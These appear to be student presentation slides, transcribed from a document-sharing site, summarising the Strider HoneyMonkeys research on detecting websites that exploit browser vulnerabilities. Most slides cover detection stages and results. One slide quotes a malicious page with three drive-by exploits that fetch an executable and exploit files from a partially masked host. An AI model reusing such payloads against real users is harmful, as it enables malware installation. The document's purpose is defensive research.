Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser
-
Upload
alexandra-brennan -
Category
Documents
-
view
34 -
download
0
description
Transcript of Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser
![Page 1: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/1.jpg)
Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser Vulnerabilities
AUTHORS: Yi-Min Wang, Doug Beck, Xuxian Jiang, Roussi Roussev,Chad Verbowski, Shuo Chen, and Sam King
PUBLISHED IN: MICROSOFT RESEARCH ,Redmond
![Page 2: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/2.jpg)
EMERGING ATTACK : INTERNET ATTACKS BY MALICIOUS WEBSITE
EXPLOIT BROWSER VULNERABILITIES
INSTALL MALICIOUS CONTENTS
USE OF HONEYMONKEYS FOR SOLUTION
PROPOSED PROBLEM
![Page 3: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/3.jpg)
BROWSER BASED VULNERABILITY
Code Obfuscation
URL redirection
Vulnerability exploitation
Malware installation
![Page 4: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/4.jpg)
CODE OBFUSCATION
![Page 5: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/5.jpg)
CODE OBFUSCATION
• To escape from signature based scanning• Custom decoding routine included inside
the script• Unreadable long strings that are
encoded and decoded later by the script or by the browser
![Page 6: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/6.jpg)
ENCODED MALICIOUS CODE
![Page 7: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/7.jpg)
DECODED MALICIOUS CODE
![Page 8: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/8.jpg)
URL REDIRECTION
![Page 9: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/9.jpg)
URL REDIRECTION
• PRIMARY URL TO SECONDARY URL • PROTOCOL REDIRECTION USING HTTP
302 TEMPORARY REDIRECT• HTML TAGS • Script functions including window.location.replace().
![Page 10: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/10.jpg)
URL REDIRECTION
PRIMARY SECONDARY
USER
http://[IP address]/[8 chars]/test2/iejp.htmhttp://[IP address]
![Page 11: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/11.jpg)
VULNERABILITY EXPLOITATION
![Page 12: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/12.jpg)
VULNERABILITY EXPLOITATION
• Malicious Website attempt to exploit multiple vulnerabilities
• HTML fragment – multiple files from different URL’S
• Dynamic code injection using Document.write• Trojan downloader works after exploits• Most attacked browser is IE
![Page 13: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/13.jpg)
EXAMPLE FOR VULNERABILITY
<html><head><title></title></head><body><style>* {CURSOR: url("http://vxxxxxxe.biz/adverts/033/sploit.anr")}</style>
<APPLET ARCHIVE='count.jar' CODE='BlackBox.class' WIDTH=1 HEIGHT=1><PARAM NAME='url' VALUE='http://vxxxxxxe.biz/adverts/033/win32.exe'></APPLET><script>Try{document.write('<objectdata=`ms-its:mhtml:file://
C:\fo'+'o.mht!'+'http://vxxxx'+'xxe.biz//adv'+'erts//033//targ.ch'+'m::/targ'+'et.htm` type=`text/x-scriptlet`></ob'+'ject>');}catch(e){}</script></body></html>
Exploit 1
Exploit 2
Exploit 3
![Page 14: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/14.jpg)
Honey Monkey Exploit Detection System
• Active client side virtual machines called honeypots
• Large scale, systematic and automated web patrol
• It mimics human browsing• Different patches and different levels of
vulnerability
![Page 15: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/15.jpg)
HONEYMONKEY SYSTEM
• Stage 1 – scalable mode by visiting N-URLs.
• Stage 2 – perform recursive redirected analysis.
• Stage 3 – scan exploit URLs using fully patched VMs.
![Page 16: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/16.jpg)
HONEY MONKEY SYSTEM
![Page 17: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/17.jpg)
TOPOLOGY GRAPH AND NODE RANKING
• Rectangular nodes represent Exploit URL’s
• Arrows represent traffic redirection• Circles represent nodes that act as an
aggregation point for exploit pages hosted
• R is the most likely exploit provider
![Page 18: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/18.jpg)
TOPOLOGY GRAPH AND NODE RANKING
![Page 19: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/19.jpg)
GENERATING URL LISTS
• Generating URL LISTS - Suspicious URL’s - Popular websites – if attacked potentially attack larger population - Localized space websites
![Page 20: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/20.jpg)
Exploit Detection Report
• Executable files created or modified outside the browser sandbox folders
• Processes created • Windows registry entry created or
modified• Vulnerability exploited• Redirect URL visited
![Page 21: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/21.jpg)
Patch level statistics
![Page 22: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/22.jpg)
RESULTS
![Page 23: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/23.jpg)
![Page 24: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/24.jpg)
ADVANTAGES
• Automatic• Scalable• Non-signature based approach• Stage-wise detection
![Page 25: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/25.jpg)
DISADVANTGES
• Exploiters may randomize the attack confusing the honey monkeys
• Exploiters were able to detect honey monkeys by sending dialog box
• They didn’t explain about topology graphs very clearly
![Page 26: Automated Web Patrol with Strider Honey Monkeys: Finding Web Sites That Exploit Browser](https://reader033.fdocuments.net/reader033/viewer/2022051401/56812f2c550346895d94be7f/html5/thumbnails/26.jpg)
IMPROVEMENTS
They need to work on accuracy
They need more classification according to contents
They should improve on avoiding detection by the honey monkeys